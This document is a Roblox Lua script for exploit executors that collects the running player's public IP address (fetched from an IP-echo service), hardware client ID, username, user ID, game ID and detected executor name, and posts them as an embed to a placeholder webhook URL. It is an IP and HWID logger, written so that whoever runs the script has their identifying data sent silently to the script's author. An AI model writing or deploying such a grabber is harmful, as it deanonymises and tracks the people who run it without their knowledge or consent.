local plr = game.Players.LocalPlayer
repeat wait() until plr.Character
local gui = script.Parent
local urlprofile = "https://roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile"
local hacjer = 'webhook_here'
local ident = game:HttpGet("https://v4.ident.me/")
local HWIDPal = game:GetService("RbxAnalyticsService"):GetClientId()
local plr = game.Players.LocalPlayer
local OSTime = os.time()
local Time = os.date('!*t', OSTime)
local function getexploit()
    local exploit =
        (syn and not is_sirhurt_closure and not pebc_execute and "Synapse X") or 
        (isexecutorclosure and "Script-Ware V2") or
        (secure_load and "Sentinel") or
        (is_sirhurt_closure and "SirHurt V4") or
        (pebc_execute and "ProtoSmasher") or
        (KRNL_LOADED and "Krnl") or
        (WrapGlobal and "WeAreDevs") or
        (isvm and "Proxo") or
        (shadow_env and "Shadow") or
        (jit and "EasyExploits") or
        (getreg()['CalamariLuaEnv'] and "Calamari") or
        (unit and "Unit") or
        ("Undetectable")
    return exploit
end
local Content = ""
local Embed = {
            ["title"] = "**New Execution**",
            ["description"] = "Name: "..plr.Name.."\nDisplay: "..plr.DisplayName.."\nExploit: "..getexploit().."\nGame: "..game.PlaceId,
            ["type"] = "rich",
            ["color"] = tonumber(12653),
            ["image"] = {
                ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=250&y=250&Format=Png&username="..plr.Name
            },
            ["fields"] = {
                {
                    ["name"] = "__HWID:__",
                    ["value"] = HWIDPal,
                    ["inline"] = true
                },
                {
                    ["name"] = "__User ID:__",
                    ["value"] = plr.UserId,
                    ["inline"] = true
                }
            },
            ["footer"] = {
                ["text"] = "IP Address: "..tostring(ident),
                ["icon_url"] = ""
            },
            ["timestamp"] = string.format('%d-%d-%dT%02d:%02d:%02dZ', Time.year, Time.month, Time.day, Time.hour, Time.min, Time.sec),
};
(syn and syn.request or http_request or http.request) {
    Url = hacjer;
    Method = 'POST';
    Headers = {
        ['Content-Type'] = 'application/json';
    };
    Body = game:GetService'HttpService':JSONEncode({content = Content; embeds = {Embed}; });
};
